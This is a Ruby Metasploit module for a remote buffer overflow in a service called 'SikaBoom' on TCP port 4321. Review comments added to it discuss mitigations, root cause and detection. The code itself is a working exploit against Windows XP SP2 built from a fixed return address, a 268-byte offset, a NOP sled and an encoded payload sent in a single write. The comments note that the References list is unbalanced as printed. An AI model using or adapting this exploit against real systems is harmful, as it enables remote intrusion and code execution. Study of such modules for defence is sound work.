require 'msf/core'
# Metasploit Framework module describing a remote buffer overflow in a product
# the page calls "SikaBoom", delivered over a plain TCP connection.
#
# Review notes (defensive reading of this listing):
# - The only advisory data on the page is the product name; no version,
#   CVE or vendor reference is given, so affected builds cannot be determined
#   from this file alone.
# - The single target pins one absolute address for "Windows XP SP2 En".
#   NOTE(review): that implies the technique depends on a fixed address in the
#   target process; address-space randomisation and non-executable stacks are
#   the usual platform mitigations against this class of bug -- confirm
#   against the affected product before relying on that.
# - The root cause class is missing length validation on data read from the
#   network; the durable fix is bounds checking in the service itself.
class Metasploit3 < Msf::Exploit::Remote
# Tcp mixin; presumably the source of connect, disconnect and `sock` used in #exploit.
include Msf::Exploit::Remote::Tcp
# Registers the module metadata and the default remote port (4321).
#
# @param info [Hash] caller-supplied metadata merged through update_info
def initialize(info = {})
super (update_info(info,
'Name' => 'SikaBoom Remote Buffer overflow' ,
'Description' => %q{
This module exploits a buffer overflow in SikaBoom .
},
# NOTE(review): the framework's conventional key for author credit is
# 'Author'; 'Module' is not a metadata key I recognise -- confirm.
'Module' => [ 'Asesino04' ],
# NOTE(review): the References list opens on the next line, but the page shows
# no entries and no closing bracket before 'DefaultOptions'. The advisory for
# this issue therefore cannot be identified from this listing, and the hash
# literal is unbalanced as printed.
'References' =>
[
'DefaultOptions' =>
{
'EXITFUNC' => 'process' ,
},
'Payload' =>
{
# Maximum payload size in bytes.
'Space' => 268 ,
# Byte values the encoded payload must not contain.
'BadChars' => "\x00\xff" ,
},
'Platform' => 'win' ,
'Targets' =>
[
# One target only: a hard-coded return address and the byte count written
# before it. Both values are specific to this OS build per the label.
[ 'Windows XP SP2 En' ,
{ 'Ret' => 0x5D38827C, 'Offset' => 268 } ],
],
'DefaultTarget' => 0 ,
'Privileged' => false
))
# Default remote port for the targeted service; defenders can use it to scope
# exposure checks (which hosts accept connections on TCP 4321).
register_options(
[
Opt:: RPORT ( 4321 )
], self . class )
end
# Opens the TCP connection, sends one oversized message and hands control to
# the framework's session handler.
#
# Layout of the message, in order: target['Offset'] filler bytes, the target's
# return address packed as a 32-bit little-endian value, 50 more filler bytes,
# then the encoded payload.
#
# Detection-relevant behaviour visible here: the message is the first and only
# write on the connection, nothing is read from the service beforehand, and
# its length is at least Offset + 4 + 50 bytes.
def exploit
connect
junk = make_nops(target[ 'Offset' ])
sploit = junk + [target.ret].pack( 'V' ) + make_nops( 50 ) + payload.encoded
sock.put(sploit)
handler
disconnect
end
end